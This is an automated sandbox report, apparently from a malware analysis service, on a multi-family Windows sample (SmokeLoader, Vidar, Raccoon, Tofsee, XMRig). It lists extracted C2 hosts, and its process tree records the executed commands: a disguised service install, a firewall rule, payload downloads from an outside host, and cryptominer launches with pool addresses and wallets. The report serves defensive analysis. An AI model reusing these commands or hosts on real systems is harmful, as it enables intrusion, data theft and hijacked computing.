Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    105s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    11/01/2022, 17:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    02beec78b80ea72e8fd8f0385aefe8ece3c00c80a4eb79cb98678d6770ef49dc.exe

  • Size

    272KB

  • MD5

    083ff64f72b3bb326de1e785d2d5967a

  • SHA1

    6fb6d88323af4db0a943d34d1257fb6872e1a909

  • SHA256

    02beec78b80ea72e8fd8f0385aefe8ece3c00c80a4eb79cb98678d6770ef49dc

  • SHA512

    80d9f9ed37d3b55d8eba6f1a830e66c1d4a132ac8456d7da5c708e76886bce82718e69a9cce69399194a93a400b15d19443eb699b04c21fc315b5f543f75901c

Score
10/10
arkeiloaderbotraccoonsmokeloadertofseevidarxmrig565backdoorcollectiondiscoveryevasionloaderminerpersistencespywarestealertrojanupx

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

raccoon

Version

1.8.4-hotfixs

rc4.plain

Extracted

Family

vidar

Version

49.6

Botnet

565

C2

https://noc.social/@banda5ker

https://mastodon.social/@banda6ker
Attributes
  • profile_id

    565

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

    loaderminerloaderbot
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Arkei Stealer Payload 2 IoCs
    stealer
  • LoaderBot executable 1 IoCs
  • Vidar Stealer 2 IoCs
    stealer
  • XMRig Miner Payload 1 IoCs
    miner
  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 32 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 13 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 12 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\02beec78b80ea72e8fd8f0385aefe8ece3c00c80a4eb79cb98678d6770ef49dc.exe
    "C:\Users\Admin\AppData\Local\Temp\02beec78b80ea72e8fd8f0385aefe8ece3c00c80a4eb79cb98678d6770ef49dc.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3328
    • C:\Users\Admin\AppData\Local\Temp\02beec78b80ea72e8fd8f0385aefe8ece3c00c80a4eb79cb98678d6770ef49dc.exe
      "C:\Users\Admin\AppData\Local\Temp\02beec78b80ea72e8fd8f0385aefe8ece3c00c80a4eb79cb98678d6770ef49dc.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3388
  • C:\Users\Admin\AppData\Local\Temp\C31.exe
    C:\Users\Admin\AppData\Local\Temp\C31.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:4344
  • C:\Users\Admin\AppData\Local\Temp\1598.exe
    C:\Users\Admin\AppData\Local\Temp\1598.exe
    1⤵
    • Executes dropped EXE
    PID:4320
  • C:\Users\Admin\AppData\Local\Temp\19CF.exe
    C:\Users\Admin\AppData\Local\Temp\19CF.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4388
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jbhkzzqi\
      2⤵
        PID:544
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ohwbuwtc.exe" C:\Windows\SysWOW64\jbhkzzqi\
        2⤵
          PID:360
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create jbhkzzqi binPath= "C:\Windows\SysWOW64\jbhkzzqi\ohwbuwtc.exe /d\"C:\Users\Admin\AppData\Local\Temp\19CF.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1224
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description jbhkzzqi "wifi internet conection"
            2⤵
              PID:1516
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start jbhkzzqi
              2⤵
                PID:1748
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2272
              • C:\Users\Admin\AppData\Local\Temp\1D89.exe
                C:\Users\Admin\AppData\Local\Temp\1D89.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3208
                • C:\Users\Admin\AppData\Local\Temp\1D89.exe
                  C:\Users\Admin\AppData\Local\Temp\1D89.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:884
              • C:\Windows\SysWOW64\jbhkzzqi\ohwbuwtc.exe
                C:\Windows\SysWOW64\jbhkzzqi\ohwbuwtc.exe /d"C:\Users\Admin\AppData\Local\Temp\19CF.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2068
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:4520
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                      PID:4344
                • C:\Users\Admin\AppData\Local\Temp\79A5.exe
                  C:\Users\Admin\AppData\Local\Temp\79A5.exe
                  1⤵
                  • Executes dropped EXE
                  PID:1628
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 936
                    2⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Program crash
                    PID:368
                • C:\Users\Admin\AppData\Local\Temp\8BA7.exe
                  C:\Users\Admin\AppData\Local\Temp\8BA7.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:5008
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im 8BA7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8BA7.exe" & del C:\ProgramData\*.dll & exit
                    2⤵
                      PID:2416
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im 8BA7.exe /f
                        3⤵
                        • Kills process with taskkill
                        PID:2684
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 6
                        3⤵
                        • Delays execution with timeout.exe
                        PID:1988
                  • C:\Users\Admin\AppData\Local\Temp\923F.exe
                    C:\Users\Admin\AppData\Local\Temp\923F.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:2676
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      2⤵
                        PID:5016
                    • C:\Users\Admin\AppData\Local\Temp\96A5.exe
                      C:\Users\Admin\AppData\Local\Temp\96A5.exe
                      1⤵
                      • Executes dropped EXE
                      PID:4088
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ready\svchost.cmd" /S"
                        2⤵
                          PID:2776
                          • C:\Windows\system32\mode.com
                            mode 65,10
                            3⤵
                              PID:1448
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e file.zip -p___________21627pwd5468pwd19404___________ -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1784
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_10.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4360
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_9.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3020
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_8.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4736
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_7.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1616
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_6.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3884
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_5.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2072
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_4.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:4384
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_3.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:2200
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_2.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:5100
                            • C:\Users\Admin\AppData\Local\Temp\ready\7z.exe
                              7z.exe e extracted/file_1.zip -oextracted
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:3096
                            • C:\Windows\system32\attrib.exe
                              attrib +H "Et0qHSv0en3EbwT.exe"
                              3⤵
                              • Views/modifies file attributes
                              PID:4436
                            • C:\Users\Admin\AppData\Local\Temp\ready\Et0qHSv0en3EbwT.exe
                              "Et0qHSv0en3EbwT.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:4404
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                4⤵
                                  PID:4880
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                            • Accesses Microsoft Outlook profiles
                            • outlook_office_path
                            • outlook_win_path
                            PID:1100
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe
                            1⤵
                              PID:2328
                            • C:\Users\Admin\AppData\Local\Temp\A145.exe
                              C:\Users\Admin\AppData\Local\Temp\A145.exe
                              1⤵
                              • Executes dropped EXE
                              PID:404
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\A2B6.bat C:\Users\Admin\AppData\Local\Temp\A145.exe"
                                2⤵
                                • Modifies registry class
                                PID:3168
                                • C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe
                                  C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1980
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83\123.vbs"
                                  3⤵
                                  • Blocklisted process makes network request
                                  PID:4976
                                • C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe
                                  C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe "/download" "http://a0620531.xsph.ru/htrrfwedsqw.exe" "setup_c.exe" "" "" "" "" "" ""
                                  3⤵
                                  • Executes dropped EXE
                                  PID:3488
                                • C:\Users\Admin\AppData\Local\Temp\83\setup_c.exe
                                  setup_c.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:3972
                                • C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe
                                  C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe "/download" "http://a0620531.xsph.ru/c_setup.exe" "setup_m.exe" "" "" "" "" "" ""
                                  3⤵
                                  • Executes dropped EXE
                                  PID:768
                                • C:\Users\Admin\AppData\Local\Temp\83\setup_m.exe
                                  setup_m.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:1160
                                • C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe
                                  C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe "/download" "http://a0620531.xsph.ru/RMR.exe" "setup_s.exe" "" "" "" "" "" ""
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1200
                                • C:\Users\Admin\AppData\Local\Temp\83\setup_s.exe
                                  setup_s.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops startup file
                                  • Adds Run key to start application
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:2064
                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4820
                                • C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe
                                  C:\Users\Admin\AppData\Local\Temp\A256.tmp\A2A6.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1976

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • memory/884-166-0x0000000004D90000-0x0000000004DDB000-memory.dmp

                              Filesize

                              300KB

                              Download

                            • memory/884-163-0x0000000004CB0000-0x0000000004CC2000-memory.dmp

                              Filesize

                              72KB

                              Download

                            • memory/884-181-0x0000000006E80000-0x00000000073AC000-memory.dmp

                              Filesize

                              5.2MB

                              Download

                            • memory/884-170-0x0000000004C90000-0x0000000005296000-memory.dmp

                              Filesize

                              6.0MB

                              Download

                            • memory/884-165-0x0000000004D10000-0x0000000004D4E000-memory.dmp

                              Filesize

                              248KB

                              Download

                            • memory/884-164-0x0000000004DE0000-0x0000000004EEA000-memory.dmp

                              Filesize

                              1.0MB

                              Download

                            • memory/884-162-0x00000000052A0000-0x00000000058A6000-memory.dmp

                              Filesize

                              6.0MB

                              Download

                            • memory/884-180-0x0000000006780000-0x0000000006942000-memory.dmp

                              Filesize

                              1.8MB

                              Download

                            • memory/884-179-0x0000000005C70000-0x0000000005CD6000-memory.dmp

                              Filesize

                              408KB

                              Download

                            • memory/884-175-0x0000000005060000-0x00000000050D6000-memory.dmp

                              Filesize

                              472KB

                              Download

                            • memory/884-178-0x0000000005240000-0x000000000525E000-memory.dmp

                              Filesize

                              120KB

                              Download

                            • memory/884-177-0x0000000005DB0000-0x00000000062AE000-memory.dmp

                              Filesize

                              5.0MB

                              Download

                            • memory/884-176-0x0000000005180000-0x0000000005212000-memory.dmp

                              Filesize

                              584KB

                              Download

                            • memory/884-161-0x0000000000400000-0x0000000000420000-memory.dmp

                              Filesize

                              128KB

                              Download

                            • memory/884-160-0x0000000000400000-0x0000000000420000-memory.dmp

                              Filesize

                              128KB

                              Download

                            • memory/884-157-0x0000000000400000-0x0000000000420000-memory.dmp

                              Filesize

                              128KB

                              Download

                            • memory/1100-229-0x00000000006B0000-0x000000000071B000-memory.dmp

                              Filesize

                              428KB

                              Download

                            • memory/1100-228-0x0000000000720000-0x0000000000794000-memory.dmp

                              Filesize

                              464KB

                              Download

                            • memory/1160-319-0x0000000076980000-0x0000000076F04000-memory.dmp

                              Filesize

                              5.5MB

                              Download

                            • memory/1160-313-0x0000000000F10000-0x0000000000F72000-memory.dmp

                              Filesize

                              392KB

                              Download

                            • memory/1160-321-0x0000000074C00000-0x0000000075F48000-memory.dmp

                              Filesize

                              19.3MB

                              Download

                            • memory/1160-309-0x0000000000050000-0x0000000000051000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1160-310-0x0000000000F10000-0x0000000000F72000-memory.dmp

                              Filesize

                              392KB

                              Download

                            • memory/1160-311-0x00000000767B0000-0x0000000076972000-memory.dmp

                              Filesize

                              1.8MB

                              Download

                            • memory/1160-312-0x0000000077550000-0x0000000077641000-memory.dmp

                              Filesize

                              964KB

                              Download

                            • memory/1160-317-0x0000000073800000-0x0000000073880000-memory.dmp

                              Filesize

                              512KB

                              Download

                            • memory/1160-315-0x0000000000F10000-0x0000000000F72000-memory.dmp

                              Filesize

                              392KB

                              Download

                            • memory/1628-188-0x0000000000400000-0x0000000002BC5000-memory.dmp

                              Filesize

                              39.8MB

                              Download

                            • memory/1628-186-0x00000000047E0000-0x000000000482F000-memory.dmp

                              Filesize

                              316KB

                              Download

                            • memory/1628-187-0x0000000004830000-0x00000000048C1000-memory.dmp

                              Filesize

                              580KB

                              Download

                            • memory/1640-119-0x0000000001100000-0x0000000001116000-memory.dmp

                              Filesize

                              88KB

                              Download

                            • memory/1640-152-0x00000000030C0000-0x00000000030D6000-memory.dmp

                              Filesize

                              88KB

                              Download

                            • memory/2064-336-0x0000000000AA0000-0x0000000000EFB000-memory.dmp

                              Filesize

                              4.4MB

                              Download

                            • memory/2064-339-0x0000000077550000-0x0000000077641000-memory.dmp

                              Filesize

                              964KB

                              Download

                            • memory/2064-345-0x0000000074C00000-0x0000000075F48000-memory.dmp

                              Filesize

                              19.3MB

                              Download

                            • memory/2064-344-0x0000000076980000-0x0000000076F04000-memory.dmp

                              Filesize

                              5.5MB

                              Download

                            • memory/2064-343-0x0000000073800000-0x0000000073880000-memory.dmp

                              Filesize

                              512KB

                              Download

                            • memory/2064-337-0x00000000013B0000-0x00000000013B1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/2064-338-0x00000000767B0000-0x0000000076972000-memory.dmp

                              Filesize

                              1.8MB

                              Download

                            • memory/2068-174-0x0000000000400000-0x0000000000451000-memory.dmp

                              Filesize

                              324KB

                              Download

                            • memory/2068-172-0x0000000000CF0000-0x0000000000CFD000-memory.dmp

                              Filesize

                              52KB

                              Download

                            • memory/2068-173-0x0000000000D00000-0x0000000000D13000-memory.dmp

                              Filesize

                              76KB

                              Download

                            • memory/2328-231-0x0000000000AC0000-0x0000000000AC7000-memory.dmp

                              Filesize

                              28KB

                              Download

                            • memory/2328-232-0x0000000000AB0000-0x0000000000ABC000-memory.dmp

                              Filesize

                              48KB

                              Download

                            • memory/3208-144-0x00000000048F0000-0x00000000048F1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3208-137-0x0000000000020000-0x00000000000AA000-memory.dmp

                              Filesize

                              552KB

                              Download

                            • memory/3208-135-0x0000000000020000-0x00000000000AA000-memory.dmp

                              Filesize

                              552KB

                              Download

                            • memory/3208-140-0x0000000004900000-0x0000000004976000-memory.dmp

                              Filesize

                              472KB

                              Download

                            • memory/3208-145-0x00000000047F0000-0x00000000047F1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/3208-143-0x0000000005130000-0x000000000562E000-memory.dmp

                              Filesize

                              5.0MB

                              Download

                            • memory/3208-141-0x0000000004870000-0x000000000488E000-memory.dmp

                              Filesize

                              120KB

                              Download

                            • memory/3328-117-0x0000000000570000-0x00000000006BA000-memory.dmp

                              Filesize

                              1.3MB

                              Download

                            • memory/3328-118-0x0000000000570000-0x00000000006BA000-memory.dmp

                              Filesize

                              1.3MB

                              Download

                            • memory/3388-115-0x0000000000400000-0x0000000000409000-memory.dmp

                              Filesize

                              36KB

                              Download

                            • memory/4320-138-0x00000000005D0000-0x00000000005EC000-memory.dmp

                              Filesize

                              112KB

                              Download

                            • memory/4320-136-0x00000000005B0000-0x00000000005C1000-memory.dmp

                              Filesize

                              68KB

                              Download

                            • memory/4320-139-0x0000000000400000-0x0000000000455000-memory.dmp

                              Filesize

                              340KB

                              Download

                            • memory/4344-128-0x0000000000400000-0x0000000000452000-memory.dmp

                              Filesize

                              328KB

                              Download

                            • memory/4344-127-0x0000000000550000-0x0000000000559000-memory.dmp

                              Filesize

                              36KB

                              Download

                            • memory/4344-126-0x0000000000540000-0x0000000000549000-memory.dmp

                              Filesize

                              36KB

                              Download

                            • memory/4388-146-0x0000000000460000-0x000000000050E000-memory.dmp

                              Filesize

                              696KB

                              Download

                            • memory/4388-148-0x0000000000400000-0x0000000000451000-memory.dmp

                              Filesize

                              324KB

                              Download

                            • memory/4388-147-0x0000000000460000-0x000000000050E000-memory.dmp

                              Filesize

                              696KB

                              Download

                            • memory/4520-169-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/4520-171-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/4520-167-0x0000000002ED0000-0x0000000002EE5000-memory.dmp

                              Filesize

                              84KB

                              Download

                            • memory/4880-347-0x0000000000400000-0x0000000000430000-memory.dmp

                              Filesize

                              192KB

                              Download

                            • memory/5008-216-0x0000000000400000-0x00000000004D9000-memory.dmp

                              Filesize

                              868KB

                              Download

                            • memory/5008-214-0x0000000002130000-0x00000000021AC000-memory.dmp

                              Filesize

                              496KB

                              Download

                            • memory/5008-215-0x00000000021B0000-0x0000000002286000-memory.dmp

                              Filesize

                              856KB

                              Download

                            • memory/5016-217-0x0000000004330000-0x0000000004331000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/5016-203-0x0000000004330000-0x0000000004331000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/5016-218-0x0000000008A90000-0x0000000009096000-memory.dmp

                              Filesize

                              6.0MB

                              Download

                            • memory/5016-300-0x0000000009B10000-0x0000000009B76000-memory.dmp

                              Filesize

                              408KB

                              Download

                            • memory/5016-210-0x0000000008BD0000-0x0000000008C1B000-memory.dmp

                              Filesize

                              300KB

                              Download

                            • memory/5016-209-0x0000000008B90000-0x0000000008BCE000-memory.dmp

                              Filesize

                              248KB

                              Download

                            • memory/5016-208-0x0000000008C60000-0x0000000008D6A000-memory.dmp

                              Filesize

                              1.0MB

                              Download

                            • memory/5016-207-0x0000000008B30000-0x0000000008B42000-memory.dmp

                              Filesize

                              72KB

                              Download

                            • memory/5016-206-0x00000000090A0000-0x00000000096A6000-memory.dmp

                              Filesize

                              6.0MB

                              Download

                            • memory/5016-205-0x00000000043E0000-0x0000000004400000-memory.dmp

                              Filesize

                              128KB

                              Download

                            • memory/5016-204-0x00000000043E0000-0x0000000004400000-memory.dmp

                              Filesize

                              128KB

                              Download

                            • memory/5016-314-0x000000000A550000-0x000000000A5A0000-memory.dmp

                              Filesize

                              320KB

                              Download

                            • memory/5016-201-0x0000000004330000-0x0000000004331000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/5016-202-0x0000000004330000-0x0000000004331000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/5016-195-0x00000000043E0000-0x0000000004400000-memory.dmp

                              Filesize

                              128KB

                              Download

                            • memory/5016-299-0x0000000009010000-0x000000000902E000-memory.dmp

                              Filesize

                              120KB

                              Download

                            • memory/5016-298-0x0000000009C50000-0x000000000A14E000-memory.dmp

                              Filesize

                              5.0MB

                              Download

                            • memory/5016-297-0x00000000096B0000-0x0000000009742000-memory.dmp

                              Filesize

                              584KB

                              Download

                            • memory/5016-296-0x0000000008EF0000-0x0000000008F66000-memory.dmp

                              Filesize

                              472KB

                              Download